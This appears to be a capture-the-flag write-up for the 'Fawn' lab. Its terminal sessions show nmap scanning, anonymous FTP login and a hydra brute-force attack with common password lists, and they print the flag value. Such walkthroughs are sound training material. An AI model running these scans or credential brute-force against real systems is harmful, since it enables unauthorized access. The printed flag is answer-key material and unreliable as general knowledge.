02.FAWN (FTP)
FTP, Protocols, Reconnaissance, Anonymous/Guest Access
Last updated
FTP, Protocols, Reconnaissance, Anonymous/Guest Access
Last updated
root@oco:~$ sudo openvpn ~/Downloads/starting_point.ovpnroot@htb:~$ nmap -sV -T4 10.129.188.72 -p-
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3root@htb:~$ nmap -sV -sC -T4 10.129.188.72 -p 21
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.10.14.16
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 5
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 0 0 32 Jun 04 2021 flag.txt
Service Info: OS: Unix
* the -SC runs the default set of Nmap scripts (NSE scripts), which typically include
scripts for service enumeration, version detection, and other basic checks.
root@htb:~$ sudo nmap --script=vuln 10.129.188.72 -p 21
* the --script=vuln will run scripts that focus specifically on detecting known
vulnerabilities in the service running on port 21
- e.g., weak FTP configurations, or known vulnerabilities in the FTP service
- if no results are found then the service may be fully patched!#ANONYMOUS LOGIN METHOD
#ANONYMOUS LOGIN METHOD
root@htb:~$ ftp 10.129.188.72
Name (10.129.188.72:root): anonymous
ftp> help
* the get cmd is used to download files from the ftp server
ftp> ls
229 Entering Extended Passive Mode (|||8196|)
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 32 Jun 04 2021 flag.txt
226 Directory send OK.
* anonymous login is configured on the ftp server
- the anonymous username accepts ANY password given to it!
ftp> get flag.txt
local: flag.txt remote: flag.txt
229 Entering Extended Passive Mode (|||59553|)
150 Opening BINARY mode data connection for flag.txt (32 bytes).
100% |*************************************************************************************************************************************************| 32 108.88 KiB/s 00:00 ETA
226 Transfer complete.
32 bytes received in 00:00 (3.46 KiB/s)
ftp> exit
root@htb:~$ cat flag.txt
* 035db21c881520061c53e0536e44f815#BRUTE FORCE METHOD
#BRUTE FORCE METHOD
root@htb:~$ locate username
/usr/share/seclists/Usernames/top-usernames-shortlist.txt
root@htb:~$ cp /usr/share/seclists/Usernames/top-usernames-shortlist.txt .
root@htb:~$ locate password
/usr/share/seclists/Passwords/Common-Credentials/top-passwords-shortlist.txt
root@htb:~$ cp /usr/share/seclists/Passwords/Common-Credentials/top-passwords-shortlist.txt .
root@htb:~$ hydra -L top-usernames-shortlist.txt -P top-passwords-shortlist.txt 10.129.188.72 ftp
[21][ftp] host: 10.129.188.72 login: ftp password: password
[21][ftp] host: 10.129.188.72 login: ftp password: 123456
[21][ftp] host: 10.129.188.72 login: ftp password: abc123
[21][ftp] host: 10.129.188.72 login: ftp password: querty
[21][ftp] host: 10.129.188.72 login: ftp password: 12345678
[21][ftp] host: 10.129.188.72 login: ftp password: monkey
[STATUS] 313.00 tries/min, 313 tries in 00:01h, 112 to do in 00:01h, 16 active
1 of 1 target successfully completed, 6 valid passwords found
root@htb:~$ ftp 10.129.188.72
Name (10.129.188.72:root): ftp
331 Please specify the password.
Password: password
ftp> help
* the get cmd is used to download files from the ftp server
ftp> ls
229 Entering Extended Passive Mode (|||8196|)
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 32 Jun 04 2021 flag.txt
226 Directory send OK.
* anonymous login is configured on the ftp server
- the anonymous username accepts ANY password given to it!
ftp> get flag.txt
local: flag.txt remote: flag.txt
229 Entering Extended Passive Mode (|||59553|)
150 Opening BINARY mode data connection for flag.txt (32 bytes).
100% |*************************************************************************************************************************************************| 32 108.88 KiB/s 00:00 ETA
226 Transfer complete.
32 bytes received in 00:00 (3.46 KiB/s)
ftp> exit
root@htb:~$ cat flag.txt
* 035db21c881520061c53e0536e44f815